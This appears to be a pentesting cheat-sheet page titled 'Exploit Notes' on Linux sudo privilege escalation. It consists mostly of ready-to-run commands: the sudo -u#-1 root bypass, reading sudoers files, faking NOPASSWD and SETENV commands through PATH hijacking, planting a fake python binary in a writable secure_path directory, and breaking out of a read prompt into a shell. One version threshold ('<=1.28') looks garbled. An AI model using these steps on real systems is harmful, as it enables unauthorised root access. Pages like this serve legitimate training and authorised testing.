Exploit Notes

Sudo Privilege Escalation

Last modified: 2023-02-23

Privilege Escalation

Sudo commands might be vulnerable to privilege escalation (PrivEsc).

GTFOBins

GTFOBins provides a wide variety of payloads to privilege escalation.
So it's recommended to look for in there.


Investigation

Version

sudo --version

If the sudo version <=1.28, try the following command.

sudo -u#-1 /bin/bash

As Another Users

sudo su root
sudo -u john whoami
# -s: run shell as target user
sudo -s

Sudo commands (Sudoers)

sudo -l
sudo -ll

# Specify hostname
sudo -h <host-name> -l
# Execute via the hostname
sudo -h <host-name> /bin/bash

Also we might see from following files.

cat /etc/sudoers
cat /etc/sudoers.d/usersgroup

If we find the following result for sudoers,

(ALL, !root) NOPASSWD: /bin/bash

We might be able to get a root shell as follow.

sudo -u#-1 /bin/bash

Command Forgery (NOPASSWD)

If you are allowed to execute some command, you can forge the contents of the command.
First off, check the properties.

sudo -l
(root) NOPASSWD: somecmd

If you can confirm that it can be executed as root without password, create the same named command in the arbitrary folder in which you can write files.

# option 1
echo /bin/sh > /tmp/somecmd

Next, change the permission for allowing to execute it.
And add the path to the environment.

chmod +x /tmp/somecmd
export PATH=/tmp:$PATH

Now execute the command as root.

sudo somecmd
whoami
# root

Command Forgery (SETENV, NOPASSWD)

If you found there is a SETENV: in sudoers, you can set the PATH when running the command.

sudo -l
(root) SETENV: NOPASSWD: somecmd

As the previous section, prepare the payload.

echo '/bin/bash -p' > /tmp/somecmd
chmod +x /tmp/somecmd

Now run the command as root with setting the PATH.

sudo PATH=/tmp:$PATH somecmd
whoami

Command Path Hijacking

sudo -l

env_reset
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

(root) python /home/user/example.py

If we can execute some command as root but env_reset and secure_path are set, we cannot override the PATH environment variable.
Instead we need to check if we have permission to write each path.

ls -al /usr/local/
ls -al /usr/
ls -al /

Assume we can write an arbitrary binary file under /usr/sbin, we can create a payload in there.
For example, we create a python binary under /usr/sbin.

echo /bin/bash > /usr/sbin/python
chmod +x /usr/sbin/python

Then execute the sudo command.

sudo python /home/user/example.py

Now we should get a root shell.


Shell in Prompt

#!/bin/bash

read -p "What's you name: "

If we found there is another user’s script which can be executed as root, you can input `/bin/bash -i` to get a shell as another user.

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.